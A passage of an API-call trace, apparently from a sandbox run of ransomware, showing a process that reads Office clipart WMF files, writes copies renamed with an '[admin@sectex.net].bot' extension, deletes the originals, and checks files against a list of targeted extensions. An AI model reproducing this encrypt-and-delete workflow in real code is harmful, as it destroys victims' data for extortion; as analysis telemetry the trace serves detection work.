	[0168.723] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x785c, lpOverlapped=0x0) returned 1
	[0168.992] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x7860, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x7860, lpOverlapped=0x0) returned 1
	[0168.993] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0168.993] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0168.993] SetEndOfFile (hFile=0x268) returned 1
	[0168.993] CloseHandle (hObject=0x268) returned 1
	[0168.993] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0168.993] SetEndOfFile (hFile=0x3ac) returned 1
	[0168.997] CloseHandle (hObject=0x3ac) returned 1
	[0168.997] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0168.997] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152628.wmf")) returned 1
	[0169.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.000] lstrlenW (lpString=".doc") returned 4
	[0169.000] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.000] lstrlenW (lpString=".docx") returned 5
	[0169.000] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.000] lstrlenW (lpString=".pdf") returned 4
	[0169.000] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.000] lstrlenW (lpString=".xls") returned 4
	[0169.000] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.000] lstrlenW (lpString=".xlsx") returned 5
	[0169.000] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.000] lstrlenW (lpString=".ppt") returned 4
	[0169.000] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.000] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.000] lstrlenW (lpString=".zip") returned 4
	[0169.000] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.000] lstrlenW (lpString=".rar") returned 4
	[0169.000] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.000] lstrlenW (lpString=".bz2") returned 4
	[0169.000] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString=".7z") returned 3
	[0169.001] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.001] lstrlenW (lpString=".dbf") returned 4
	[0169.001] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.001] lstrlenW (lpString=".1cd") returned 4
	[0169.001] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.001] lstrlenW (lpString=".jpg") returned 4
	[0169.001] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.001] lstrlenW (lpString=".doc") returned 4
	[0169.001] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString=".docx") returned 5
	[0169.001] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.001] lstrlenW (lpString=".pdf") returned 4
	[0169.001] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString=".xls") returned 4
	[0169.001] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.001] lstrlenW (lpString=".xlsx") returned 5
	[0169.001] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.001] lstrlenW (lpString=".ppt") returned 4
	[0169.001] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.001] lstrlenW (lpString=".zip") returned 4
	[0169.001] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.001] lstrlenW (lpString=".rar") returned 4
	[0169.001] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString=".bz2") returned 4
	[0169.001] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.001] lstrlenW (lpString=".7z") returned 3
	[0169.001] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.001] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.002] lstrlenW (lpString=".dbf") returned 4
	[0169.002] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.002] lstrlenW (lpString=".1cd") returned 4
	[0169.002] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.002] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152628.WMF") returned 63
	[0169.002] lstrlenW (lpString=".jpg") returned 4
	[0169.002] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.002] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.002] lstrlenW (lpString="J0152690.WMF") returned 12
	[0169.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.002] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1268) returned 1
	[0169.002] CloseHandle (hObject=0x3ac) returned 1
	[0169.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf")) returned 0x20
	[0169.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.004] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.004] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0169.005] GetLastError () returned 0x0
	[0169.005] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4f4, lpOverlapped=0x0) returned 1
	[0169.068] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x500, lpOverlapped=0x0) returned 1
	[0169.069] ReadFile (in: hFile=0x3ac, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.069] WriteFile (in: hFile=0x268, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.069] SetEndOfFile (hFile=0x268) returned 1
	[0169.069] CloseHandle (hObject=0x268) returned 1
	[0169.069] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.069] SetEndOfFile (hFile=0x3ac) returned 1
	[0169.071] CloseHandle (hObject=0x3ac) returned 1
	[0169.071] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152690.wmf")) returned 1
	[0169.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.072] lstrlenW (lpString=".doc") returned 4
	[0169.072] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.072] lstrlenW (lpString=".docx") returned 5
	[0169.072] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.072] lstrlenW (lpString=".pdf") returned 4
	[0169.072] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.072] lstrlenW (lpString=".xls") returned 4
	[0169.072] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.072] lstrlenW (lpString=".xlsx") returned 5
	[0169.072] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.072] lstrlenW (lpString=".ppt") returned 4
	[0169.072] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.072] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.072] lstrlenW (lpString=".zip") returned 4
	[0169.072] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.072] lstrlenW (lpString=".rar") returned 4
	[0169.073] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.073] lstrlenW (lpString=".bz2") returned 4
	[0169.073] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.073] lstrlenW (lpString=".7z") returned 3
	[0169.073] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.073] lstrlenW (lpString=".dbf") returned 4
	[0169.073] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.073] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.073] lstrlenW (lpString=".1cd") returned 4
	[0169.073] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.074] lstrlenW (lpString=".jpg") returned 4
	[0169.074] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.074] lstrlenW (lpString=".doc") returned 4
	[0169.074] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString=".docx") returned 5
	[0169.074] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0169.074] lstrlenW (lpString=".pdf") returned 4
	[0169.074] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString=".xls") returned 4
	[0169.074] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.074] lstrlenW (lpString=".xlsx") returned 5
	[0169.074] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0169.074] lstrlenW (lpString=".ppt") returned 4
	[0169.074] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.074] lstrlenW (lpString=".zip") returned 4
	[0169.074] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.074] lstrlenW (lpString=".rar") returned 4
	[0169.074] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString=".bz2") returned 4
	[0169.074] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString=".7z") returned 3
	[0169.074] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.074] lstrlenW (lpString=".dbf") returned 4
	[0169.074] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.074] lstrlenW (lpString=".1cd") returned 4
	[0169.074] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152690.WMF") returned 63
	[0169.075] lstrlenW (lpString=".jpg") returned 4
	[0169.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.075] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.075] lstrlenW (lpString="J0152698.WMF") returned 12
	[0169.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0169.089] GetFileSizeEx (in: hFile=0x3e8, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=1208) returned 1
	[0169.089] CloseHandle (hObject=0x3e8) returned 1
	[0169.089] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf")) returned 0x20
	[0169.091] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.092] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.092] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.092] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.093] GetLastError () returned 0x0
	[0169.093] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x4b8, lpOverlapped=0x0) returned 1
	[0169.104] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0x4c0, lpOverlapped=0x0) returned 1
	[0169.105] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x0, lpOverlapped=0x0) returned 1
	[0169.105] WriteFile (in: hFile=0x3ac, lpBuffer=0xb180020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa68fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesWritten=0xa68fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0169.105] SetEndOfFile (hFile=0x3ac) returned 1
	[0169.105] CloseHandle (hObject=0x3ac) returned 1
	[0169.105] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.106] SetEndOfFile (hFile=0x3d0) returned 1
	[0169.107] CloseHandle (hObject=0x3d0) returned 1
	[0169.108] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0169.108] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152698.wmf")) returned 1
	[0169.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.109] lstrlenW (lpString=".doc") returned 4
	[0169.109] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString=".docx") returned 5
	[0169.109] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.109] lstrlenW (lpString=".pdf") returned 4
	[0169.109] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString=".xls") returned 4
	[0169.109] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.109] lstrlenW (lpString=".xlsx") returned 5
	[0169.109] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.109] lstrlenW (lpString=".ppt") returned 4
	[0169.109] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.109] lstrlenW (lpString=".zip") returned 4
	[0169.109] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.109] lstrlenW (lpString=".rar") returned 4
	[0169.109] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString=".bz2") returned 4
	[0169.109] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString=".7z") returned 3
	[0169.109] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.109] lstrlenW (lpString=".dbf") returned 4
	[0169.109] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.109] lstrlenW (lpString=".1cd") returned 4
	[0169.109] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.109] lstrlenW (lpString=".jpg") returned 4
	[0169.109] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.110] lstrlenW (lpString=".doc") returned 4
	[0169.110] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString=".docx") returned 5
	[0169.110] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1
	[0169.110] lstrlenW (lpString=".pdf") returned 4
	[0169.110] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString=".xls") returned 4
	[0169.110] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0169.110] lstrlenW (lpString=".xlsx") returned 5
	[0169.110] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1
	[0169.110] lstrlenW (lpString=".ppt") returned 4
	[0169.110] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.110] lstrlenW (lpString=".zip") returned 4
	[0169.110] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0169.110] lstrlenW (lpString=".rar") returned 4
	[0169.110] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString=".bz2") returned 4
	[0169.110] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString=".7z") returned 3
	[0169.110] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0169.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.110] lstrlenW (lpString=".dbf") returned 4
	[0169.110] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.110] lstrlenW (lpString=".1cd") returned 4
	[0169.110] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0169.110] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152698.WMF") returned 63
	[0169.110] lstrlenW (lpString=".jpg") returned 4
	[0169.110] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0169.111] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0169.111] lstrlenW (lpString="J0152708.WMF") returned 12
	[0169.111] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.111] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa68ff1c | out: lpFileSize=0xa68ff1c*=4908) returned 1
	[0169.111] CloseHandle (hObject=0x3d0) returned 1
	[0169.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf")) returned 0x20
	[0169.111] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0169.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0169.112] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.112] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa68fec8 | out: lpNewFilePointer=0x0) returned 1
	[0169.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152708.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152708.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0169.113] GetLastError () returned 0x0
	[0169.113] ReadFile (in: hFile=0x3d0, lpBuffer=0xb180020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa68fed4, lpOverlapped=0x0 | out: lpBuffer=0xb180020*, lpNumberOfBytesRead=0xa68fed4*=0x132c, lpOverlapped=0x0) returned 1
